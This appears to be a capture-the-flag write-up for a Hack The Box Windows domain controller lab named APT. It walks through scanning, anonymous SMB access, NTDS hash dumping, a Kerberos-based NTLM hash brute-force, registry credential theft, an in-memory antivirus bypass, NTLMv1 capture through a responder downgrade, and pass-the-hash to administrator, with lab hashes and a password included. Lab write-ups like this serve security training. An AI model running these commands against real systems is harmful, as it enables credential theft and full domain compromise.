APT
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.213 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135 10.10.10.213 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
The website on port 80 shows a hosting site named Gigantic Hosting. Nothing is interesting on the website.
As port 135 is also open, we could try to identify the IP addresses of the machines. We'll have to do it with the IOXIDResolver tool.
python IOXIDResolver.py -t 10.10.10.213
The machine has a few IPv6 addresses. Let's add the first one to the /etc/hosts file and assign the apt name to the IPv6 address.
nano /etc/hosts
Now that we have the IPv6 address of the machine, we could try to run the nmap scan, but this time through IPv6.
nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 apt
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.-6use IPv6 address.
There are way more ports exposed through IPv6 than IPv4. Let's get their services and versions.
nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 apt
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.-6use IPv6 address.
This looks like a domain controller. Nmap got the domain name htb.local. Let's add it to the /etc/hosts file.
nano /etc/hosts
Let's enumerate the SMB shares of the DC.
smbclient -L apt -N
As seen below, the backup share has one file called backup.zip. Let's transfer it to our local machine.
smbclient //apt/backup -N
If we try to unzip it, we'll see it is protected with a password.
unzip backup.zip
Let's use zip2john and john to get the password.
zip2john backup.zip > hash
john -w=/usr/share/wordlists/rockyou.txt hash
Now, unzip the file, and we'll see
unzip backup.zip
The compressed file contains the ntds.dit and SYSTEM file. With these two files we could try to dump the NTDS hashes using secretsdump.
impacket-secretsdump -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile ntds_dump
As we can see, there are a lot of users and hashes. Let's put the users in the users file, and the NTLM hashes in the ntlm file.
cat ntds_dump.ntds | awk '{print $1}' FS=":" > users
cat ntds_dump.ntds | awk '{print $4}' FS=":" > ntlm
Exploitation
Now that we have a list of users, we'll need to find which of these users are valid. We can do it with the kerbrute tool.
kerbrute_linux_amd64 userenum --dc apt -d htb.local users
It found that the henry.vinson user is a valid user. As we have a valid user, and a list of NTLM hashes, we could try to brute force his NTLM by trying each has of the list. The problem is that if we try to do it through SMB we'll get banned.
crackmapexec smb apt -u 'henry.vinson' -H ntlm
It seems that the server is banning any attempt of brute force through SMB, but it doesn't through Kerberos, because we were able to test which users were valid. So we need to brute force the NTLM hash through Kerberos. I made the following bash script which tries to obtain a TGT for the henry.vinson user with each NTLM hash from the ntlm file. It uses the getTGT tool from impacket, and you can also set threads to make it faster.
Run the script to get the valid NTLM hash for henry.vinson.
bash bruteforcer.sh
Confirm that the hash is valid.
crackmapexec smb apt -u 'henry.vinson' -H e53d87d42adaa3ca32bdb34a876cbffb
There is one tool from impacket called reg.py, which allows to query registers remotely such us HKCR, HKCU, HKLM, HKU, or HKCC using valid credentials. We could see the content of the HKU registry.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU"
Inside HKU\Software we'll see the GiganticHostingManagementSystem register.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software"
This registry might have something interesting because is named similar as the website we saw earlier.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software\\GiganticHostingManagementSystem"
Let's verify the found credentials.
crackmapexec smb apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
They are valid, and this user seems to be a member of the Remote Management Users group because we can get a shell via WinRM and then grab the user flag.
evil-winrm -i apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
Privilege Escalation
Let's upload the WinPEAS binary to the machine in order to find possible privilege escalation paths.
upload /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
If we try to run the binary, we'll see that Windows Defender is blocking the binary.
.\winPEASx64.exe
Fortunately for us, evil-winrm has a feature to bypass the antivirus. This way the binary will be loaded and executed in memory.
Bypass-4MSI
Invoke-Binary /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
It found that NTLM services and clients on the domain controller support NTLMv1. This is a problem because NTLMv1 uses a weak authentication which can be broken. The idea is to set a fake SMB server with responder, and capture the NTLMv1 hash of the machine, which can then be cracked with crack.sh. First, modify the responder configuration file.
nano /etc/responder/Responder.conf
Then, launch responder downgrading to LM.
responder -I tun0 --lm
-Inetwork interface to use.--lmforce LM hashing downgrade.
Now we need to make the victim machine authenticate against our fake SMB server. As we know that Windows Defender is available, we can use the MpCmdRun.exe binary to load a random file from our fake SMB server.
cd "Program Files\Windows Defender"
.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.14\random
Now go to the GET CRACKING page and submit the hash.
You should receive an email with the NTLM hash for the machine account of the domain controller.
With this hash we can dump the real NTDS of the domain controller.
impacket-secretsdump -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'
Now that we have the real NTLM hash of the administrator user, we can get a shell as him, and then all we have to do is reap the harvest and take the root flag.
evil-winrm -i apt -u 'administrator' -H c370bddf384a691d811ff3495e8a72e2
Last updated